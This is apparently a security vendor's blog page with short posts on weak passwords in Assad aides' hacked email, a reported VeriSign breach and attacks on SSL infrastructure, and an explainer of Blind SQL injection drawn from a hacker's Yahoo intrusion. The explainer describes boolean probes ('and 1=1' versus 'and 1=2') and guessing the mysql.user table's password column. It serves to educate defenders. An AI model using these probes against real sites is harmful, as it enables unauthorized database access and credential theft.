|
Blog|Login|中文•Deutsche•日本語 |
In an interview, the Syrian president Assad claims that the 'American psyche can be easily manipulated.'
Not as easy to manipulate as his email password, however:
Some 78 inboxes of Assad's aides and advisers were hacked and the password that some used was "12345". Among those whose email was exposed were the Minister of Presidential Affairs Mansour Fadlallah Azzam and Assad's media adviser, Bouthaina Shaaban.
As one of our blog readers noted, "I have the same combination on my luggage."
Amazing story from Reuters.
Note how the breach was reported:
The VeriSign attacks were revealed in a quarterly U.S. Securities and Exchange Commission filing in October that followed new guidelines on reporting security breaches to investors. It was the most striking disclosure to emerge in a review by Reuters of more than 2,000 documents mentioning breach risks since the SEC guidance was published.
The article speculates that penetrating SSL certificates may have been a key target of the attack.
Until August 2010, VeriSign was one of the largest providers of Secure Sockets Layer certificates, which Web browsers look for when connecting users to sites that begin "https," including most financial sites and some email and other communications portals.
If the SSL process were corrupted, "you could create a Bank of America certificate or Google certificate that is trusted by every browser in the world," said prominent security consultant Dmitri Alperovich, president of Asymmetric Cyber Operations.
This shouldn't surprise anyone. As we wrote late in 2011, while a growing number of web applications are delivered over the HTTPS protocol (HTTP over SSL), attackers are increasingly focusing their attacks against the various components of SSL. We are seeing a rise in attacks which target the worldwide infrastructure that supports SSL. We expect these attacks to reach a tipping point in 2012 which, in turn, will invoke a serious discussion about real alternatives for secure web communications. The VeriSign attack highlights that the tipping point may have actually arrived in 2011.
So who did it?
The Reuters piece suggests government-sponsored hackers. Possible. Another possibility: private hackers who resell the booty to the governments and enterprises who may want it.
We started a blog series in January on SQL injection. Today, Groundhog Day, the groundhog predicted a longer winter full of SQL injection so now is a fitting time to post Part II of our series. Today's post was authored by Tal Be'ery (who is not pictured below).
TinKode, a famous hacker, has reportedly been caught. TinKode was talented and best known for his mastery of the black art of Blind SQL injection. (The term Blind SQL injection was coined by Imperva CTO Amichai Shulman almost a decade ago.)
Using Blind SQL injection, TinKode was able to hack many sites, including the following:
First, let’s define a blind SQL injection. According to Wikipedia:
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.
We can demonstrate it with the picures taken by TinKode himself describing the Yahoo hack published more than two years ago. In this case he found a page will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. When the logical condition evaluates to TRUE (and 1=1) “Rich Media Options” gets populated (click any photos to BIGGIFY):
But when the logical condition evaluates to FALSE (and 1=2) “Rich Media Options” remains empty:
Now TinKode was able to guess his way through the database using this method to tell him whether his guesses were right or wrong. In this query, he was able to guess that the default “mysql.user” table exists, accessible and holds the columns, user and password:
For full live demo, see also “Blindfolded SQL Injection Demonstration“ video on ImpervaChannel in youtube http://www.youtube.com/watch?v=DclGr44UDNA.
Lastly, how do you mitigate against Blind SQL injections? See Part I for the gory details.
|
|||||||||
